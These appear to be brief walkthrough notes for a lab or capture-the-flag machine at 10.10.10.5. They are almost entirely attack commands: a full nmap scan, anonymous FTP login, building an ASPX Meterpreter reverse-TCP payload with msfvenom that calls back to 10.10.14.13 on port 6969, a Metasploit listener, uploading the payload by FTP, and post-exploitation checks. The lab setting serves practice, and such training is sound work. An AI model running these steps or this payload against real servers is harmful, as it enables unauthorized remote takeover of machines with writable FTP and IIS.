Scan target:
nmap -T4 -p- -A 10.10.10.5
Test FTP for anonymous login:
ftp 10.10.10.5
#username:
anonymous
#Password:
anonymous
If you have basic execution by uploading to FTP:
terminal command for msfvenom shell for asp (IIS):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.13 LPORT=6969 -f aspx > exploit.aspx
MSFConsole:
msfconsole
use exploit/multi/handler
options
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.14.13 #ifconfig to find your tun0 IP OR do:
set lhost tun0
set lport 6969
fill info
upload to server:
connect to ftp:
ftp 10.10.10.5
put exploit.aspx
meterpreter command to find out info about the machine
getuid
sysinfo
to ls in windows:
dir